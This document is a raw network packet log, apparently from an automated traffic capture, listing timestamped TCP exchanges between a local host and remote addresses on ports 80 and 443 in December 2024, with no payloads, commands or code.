                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.369226933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.369281054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.369326115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.370274067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.370321989 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.370410919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.370454073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.371407986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.371453047 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.371545076 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.371598005 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.372606993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.372643948 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.372656107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.372687101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.373672009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.373728037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.373801947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.373852015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.374803066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.374855042 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.374882936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.374948978 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.375891924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.375951052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.376003981 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.376061916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.377005100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.377054930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.377140045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.377187014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.378144979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.378194094 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.378206015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.378252983 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.379249096 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.379293919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.379374981 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.379430056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.380363941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.380414963 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.380474091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.380516052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.381464958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.381516933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.381598949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.381648064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.382610083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.382659912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.382718086 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.382762909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.383706093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.383765936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.383847952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.383899927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.384860992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.384902954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.384958029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.385010958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.385941982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.385998964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.386046886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.386121988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387022018 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387048960 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387064934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387110949 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387137890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387203932 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387243032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387448072 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.387465000 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.388166904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.388227940 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.388297081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.388370037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.389437914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.389476061 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.389488935 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.389516115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.390460014 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.390508890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.390528917 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.390575886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.391580105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.391613960 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.391625881 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.391664028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.392630100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.392673969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.392755985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.392802000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.393815994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.393870115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.393929958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.394004107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.395009995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.395049095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.395061016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.395114899 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.395998001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.396043062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.396080971 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.396123886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.397114992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.397157907 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.397228003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.397270918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.398200035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.398247004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.398303032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.398353100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.399348021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.399400949 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.399463892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.399508953 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.400495052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.400543928 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.400561094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.400602102 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.401595116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.401648045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.401706934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.401751041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.402735949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.402781010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.402832031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.402875900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.403826952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.403872967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.403928995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.403968096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.404941082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.405000925 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.405042887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.405083895 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.406058073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.406100988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.406157970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.406197071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.407174110 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.407221079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.407274961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.407325029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.408252001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.408297062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542200089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542308092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542349100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542423964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542423964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542423964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542525053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.542577028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.543502092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.543555021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.543586016 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.543631077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.544594049 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.544667959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.544734955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.544786930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.545698881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.545752048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.545814991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.545865059 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.546806097 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.546905994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.546969891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.547017097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.547962904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.548018932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.548105001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.548154116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.549144030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.549180031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.549196959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.549223900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.550224066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.550282955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.550328970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.550375938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.551414013 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.551450968 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.551466942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.551482916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.552455902 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.552510023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.552602053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.552647114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.553504944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.553554058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.553611994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.553654909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.554661036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.554717064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.554759026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.554799080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.555788040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.555826902 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.555841923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.555885077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.556968927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.557023048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.557050943 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.557101011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.558017969 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.558072090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.558161974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.558212042 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.559170008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.559222937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.559268951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.559307098 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.560256004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.560318947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.560340881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.560393095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.561347961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.561405897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.561486959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.561532021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.562465906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.562524080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.562618017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.562660933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.563597918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.563656092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.563700914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.563749075 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.564685106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.564743042 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.564810991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.564858913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.565840006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.565890074 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.565913916 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.565962076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575675011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575726986 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575771093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575908899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575944901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575962067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.575978041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576013088 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576143980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576179028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576208115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576215982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576253891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576276064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576340914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576667070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576703072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576726913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576738119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576776028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576791048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576812029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576848030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576853037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576885939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576924086 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.576984882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577541113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577577114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577609062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577615023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577673912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577848911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.577884912 CET804980431.41.244.11192.168.2.4
